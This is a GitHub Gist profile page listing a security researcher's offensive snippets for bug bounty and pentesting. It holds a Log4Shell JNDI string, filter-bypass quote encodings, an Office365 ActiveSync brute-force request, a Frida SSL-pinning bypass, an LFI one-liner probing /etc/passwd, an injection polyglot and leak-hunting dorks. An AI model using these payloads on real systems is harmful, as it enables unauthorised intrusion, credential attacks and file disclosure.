Skip to content

Instantly share code, notes, and snippets.

View incogbyte's full-sized avatar
:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}

incogbyte incogbyte

:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}
126 followers · 72 following
View GitHub Profile
@incogbyte
incogbyte / unincodes.txt
Created May 1, 2023 12:08
List of useful unicodes to bypass some filters
#### unicodes - single quote
%u0027
%u02b9
%u02bc
%u02c8
%c0%27
%c0%a
%e0%80%a7
@incogbyte
incogbyte / burpsuitePassThrough.txt
Created April 7, 2023 20:26
Burp Proxy Pass Through
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog
@incogbyte
incogbyte / options_brute_microsoft.md
Last active December 20, 2022 12:21
options_brute_microsoft 
OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass
@incogbyte
incogbyte / mixunpin.js
Last active March 29, 2025 19:59
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@incogbyte
incogbyte / wordpress_downloader.py
Created July 29, 2022 14:34
download plugins for wordpress
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile
def wordpress_plugin():
urls = []
@incogbyte
incogbyte / oneliners.md
Last active October 31, 2023 04:03
One liners recon
  • FFUF fuzzing paths + Domains
    • assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
  • LFI testing
    • gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
@incogbyte
incogbyte / dorks.txt
Created July 11, 2022 12:51
small google foo, search info about targets domains.txt
"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com | site:.attlasian.net "target" "
@incogbyte
incogbyte / polyglotFinder.txt
Created February 28, 2022 13:36
payload finder polyglot ssti,xss,sqli
${{<%[%'"}}%\.vult00
@incogbyte
incogbyte / fonts.sh
Created February 18, 2022 16:45
Install Meslo Fonts Ubuntu Linux Mint and debians
#!/bin/bash
sudo apt install fontconfig
cd ~
wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
mkdir -p .local/share/fonts
unzip Meslo.zip -d .local/share/fonts
cd .local/share/fonts
rm *Windows*
cd ~
@incogbyte
incogbyte / base64PassGen.py
Created February 15, 2022 14:05
Small script to generate base64 passwords like, admin:admin
import os
import sys
import base64
'''
Small script to generate base64 passwords like, YWRtaW46YWRtaW4=
usage